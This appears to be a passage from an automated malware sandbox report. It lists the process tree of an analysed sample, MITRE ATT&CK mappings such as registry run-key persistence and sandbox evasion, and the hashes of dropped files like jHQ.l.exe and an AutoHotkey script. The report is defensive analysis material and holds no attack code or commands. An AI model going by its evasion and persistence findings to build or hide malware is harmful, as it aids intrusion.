- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5424 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:2352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5896 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:5008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=3552 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5644 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:2440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5900 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:1688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5732 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=6104 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:2232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=1896 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6024 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:1512
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5996 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:4332
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5664 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:8
  2⤵
  PID:1868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=4032 --field-trial-handle=1956,i,10657522094537094305,12379538953036122107,131072 /prefetch:1
  2⤵
  PID:3980

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:5104

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa39af055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:4984

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Web Service

T1102

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_h.online-metrix.net_0.indexeddb.leveldb\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
371B

MD5
a91ebd1d3799d0dd8bcf389a1abd75f1

SHA1
6199c6dfac711b8230fa929b1add0eed3f6f39ec

SHA256
ce3461416459f1ae7003f0542dcd55b182e6d0b9616bb80b02ca917425659af7

SHA512
2b62f7c13711b7225a80efe4d9043b190d4bdcee7e209b2cec4ce177aab3519b39a9780cecb7f8cf78cd8fcfbce01b11859c0b36c725cb460ae1ea657b17eb8f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
9195cd2272e8d207cb2e608f783c49e8

SHA1
e874fc971fc3849756a01430df18a12cb6c97a16

SHA256
5d4809221b372ab4317e70c6fb400cbd3de340f742e3ac04ff9288aa271cc6f6

SHA512
9d3a9cfa28b8fc291990fd3a1976cad20a38dd31e12a65b17b8190e77dbc427c6a02a559b33c747d232f90aa68ebd7254c2c16907b197b31be6220006bcfee36

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
b8d7c2a36a419fab547a8bd3fe05d66d

SHA1
31da761932553130780a1cfebd3a84e21abe6563

SHA256
38837a42065b7192bfaf605b93aeff01f854ea4eca2fffd4191ab49d45bb8df0

SHA512
01a6763a4bff946cd03435cff30aa0e5db6b4884c22b6696a7c1d0e876c6d29c194a078149d7b3d33958acd4476518b5658952b92a1c26cab5383c1189169c07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
2KB

MD5
94e3e471d98a2d657219dc426f954514

SHA1
ef17871b1e8371f08ddce3a3b9068ea43d7f2c8f

SHA256
4e70fba4c76cd9e38679e3390a26e36d4ca0002ad510049354abe5d29484f085

SHA512
298188cdc6d4ae0d5a62cf371272de8c9ebf499641bb568e0ec7a25b182e4be4799fca99db9669efb11ba311bb717a5463a4c2304f26c3fb4ffae2c5bf3ea3f8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
e2fee10e10de2d812db6b3ecd384c676

SHA1
f8e784061c63c83be915ad2717dfcf20fa571f4a

SHA256
eb4b52f5f7886fdefbb82370f8d66bf5fca256e3ce6dd6d6a37a30e41e64c1fc

SHA512
cfc2a14939c6c4545a05cc8492215e070a3b63ac2129b7063069491b9d160ea56691f2eb382aa942b51f66eb78d077af7aacbf1bc96024a8ba0805fe3a563ba8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
7KB

MD5
1ab4df47b03e7fb1833b3286665bddd1

SHA1
a037049541f48630f5473f38977b37b61f853004

SHA256
c552f1f63bc8da4c9f8e84b1b677ed937e82d06317487a815ea0c4882d389cfa

SHA512
9e9585279af1b360e260a65e16aea701e8ab9701a24facfacd8da80505530e2732b1b1145d2a70981133d096cef3bd3dff5b6c94754de57ba067a3dde3927fe1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
5f35f78e8e7b1d373dafe03683c52652

SHA1
1e696c2afae975fff467113f84465abd22a1848a

SHA256
f42e1996924773b782a756e5c48488d3039147cfe1bb9077073d66fc1a2b0c26

SHA512
ed848e48c54742a5ddb3210ea3ffc866b7992630b761fc61589ce466c9a1ffd7decff1b603a339ef57124603e38ffca1e4bc073864386c173260f93172676670

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
90KB

MD5
d8f80d71d40ea10098ddb834a6282065

SHA1
50604784578b51c1f864c7088871731dec86d4d3

SHA256
3d2c5a3ddae5e28baab4b78d3c614ef8d71dc48a49b034ada57010b97c8f2665

SHA512
1b621fb173eda658711769913a74cf3387235dc9a8154b6b836f3e2d71b4be5b2cd17b59fdd4917bf8ed8872a561d2f7de7d90db9e53ca52783361f5b9209692

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
89KB

MD5
0bc65618698ca2c53473d0c9d58e9e4f

SHA1
2348bf6398780df05b8f5cb89054629b6b3ef63a

SHA256
d8c1a13c856100780a59451cc167d08e875c49733e8057ea97d7bc8dfbc36ef6

SHA512
b1881d914ce0d09a05aedb53d32d026638e37de8c6eccfe4ea5452c92739767f1662d7acad8ce2b7edd869c9d10bb5242224f18ff828a78565fbb4a44df2a084

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
90KB

MD5
576adc405050e0ff698b790cc20a62fa

SHA1
0a805098da54c610fe06f0deda19e95b27f6f3fd

SHA256
afc3b9d5c8ece591fa7fdcff903b0196f93175438baa2d09a27a83110231eb5c

SHA512
312cf13fff828f00d36ba4393d91814526fa1a15cfc69a67e10b083ca1e3323819dffd262399596dbe419a08ef20a121fe27742735181e626ea7566926cabb7d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache

Filesize
101KB

MD5
d999825310af54d99cfdfac5cffd79f3

SHA1
fa31415f58ad122ecbdee252f8fea4a9fb44d5de

SHA256
f8bd61a26dd464152f0c97e8e19ad334b3fbf23498288811248f934fee019d89

SHA512
c27c50effd6322d785948159451ed2ab5f196903d0dadcf72a8044f479f86f53ff717ac4c326a2e0f15502e4b2c32894585c00a983d7e058da6e816fb14cd832

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe599e69.TMP

Filesize
97KB

MD5
5bf9b5baafffc673665d7a5428cf7281

SHA1
2d7784dd5cc57d20154b90be4d2632e89bebe854

SHA256
e0110a65370a820e43cd50d261d2ff82d108bb80ff0c50a4855b7e691bf9f48a

SHA512
a5ba409da473b52e735877f6ceb8014823cab37abe48945d24e5de16436acd9f76b02cdfafe8b4a7112218147a53cda4965710c5c7fd88e10ca05c7c36520002

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
9b479285e49c3a5bf577beb5a61f3862

SHA1
4c944a33c3e734bd5e15fab83652cd55cf413f6c

SHA256
53c7470200e71c8edbf87751d56bfdc4fa9726cd55bbb90ccf0f25787d734036

SHA512
17a94bfe3bb5de693e6009cae986bbfaac6c73f07257c416a5df947dbac02761ff75bc50e7cfb3c8a4adfcee6f5ac0e4152aad25d93b8d6faa3b89ec18375a52

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w1d5qvzs.adw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\winxbywinxs\UODKAUOOAKD.yFL

Filesize
11.3MB

MD5
258226695a065178ddc7b7ab001178e7

SHA1
1e78ef30926873cd22e88749fd37750d724df7ae

SHA256
36718b5e4e70409f12011da99e44384d424a84e6a8a88367e47b06fc6d8b22f2

SHA512
bd691b79688aaf8cc23628f6df63603d0c38681d2b1339ec6d33c200f751a05cc856907f0ba73294d235419f2ac8260bfd3b8051429fe2d4154bbb2f39b4740b

Download Submit
C:\winxbywinxs\UODKAUOOAKD.yFL

Filesize
11.3MB

MD5
258226695a065178ddc7b7ab001178e7

SHA1
1e78ef30926873cd22e88749fd37750d724df7ae

SHA256
36718b5e4e70409f12011da99e44384d424a84e6a8a88367e47b06fc6d8b22f2

SHA512
bd691b79688aaf8cc23628f6df63603d0c38681d2b1339ec6d33c200f751a05cc856907f0ba73294d235419f2ac8260bfd3b8051429fe2d4154bbb2f39b4740b

Download Submit
C:\winxbywinxs\jHQ.l.ahk

Filesize
177B

MD5
94dc53a07487ee0d7b120647924f354c

SHA1
74a86f40c4a5008a4e7636e915808cc519b01fd1

SHA256
338c7b000755081253374de241b9a321ed9d02a25e3ea7997e20775d05edd554

SHA512
9168935dbed64b2861a9fe37e56119f51f8992c80b4cc9c049a79003ad69d189d95dca6aa0d61eadd313aa430f4aa953c556bee6cc4063e5bed43ab71c7cdc46

Download Submit
C:\winxbywinxs\jHQ.l.exe

Filesize
889KB

MD5
03c469798bf1827d989f09f346ce95f7

SHA1
05e491bc1b8fbfbfdca24b565f2464137f30691e

SHA256
de87c8713fac002b0b0a0f9b02c4e3ebcccf65282a22f5ab5912a9da00f35c2a

SHA512
d95aed75dd7b2470d4e5052b4b494ad9efbb9eee42c63cf0b38f1d0275ff7b1bb8ee4cbc69d1bb219dbbf33ad3b01cea97f87fa8fe69be7f943aa4417a603238

Download Submit
C:\winxbywinxs\jHQ.l.exe

Filesize
889KB

MD5
03c469798bf1827d989f09f346ce95f7

SHA1
05e491bc1b8fbfbfdca24b565f2464137f30691e

SHA256
de87c8713fac002b0b0a0f9b02c4e3ebcccf65282a22f5ab5912a9da00f35c2a

SHA512
d95aed75dd7b2470d4e5052b4b494ad9efbb9eee42c63cf0b38f1d0275ff7b1bb8ee4cbc69d1bb219dbbf33ad3b01cea97f87fa8fe69be7f943aa4417a603238

Download Submit
memory/2052-190-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-182-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-237-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-525-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-187-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-186-0x0000000000A90000-0x0000000000A91000-memory.dmp

Filesize
4KB

Download
memory/2052-261-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-354-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-183-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-191-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-181-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-180-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-392-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-179-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-178-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-449-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2052-177-0x0000000072510000-0x0000000074A1E000-memory.dmp

Filesize
37.1MB

Download
memory/2728-157-0x000001EA7CC80000-0x000001EA7CC90000-memory.dmp

Filesize
64KB

Download
memory/2728-156-0x000001EA7CC80000-0x000001EA7CC90000-memory.dmp

Filesize
64KB

Download
memory/5028-134-0x000001C8F6F90000-0x000001C8F6FB2000-memory.dmp

Filesize
136KB

Download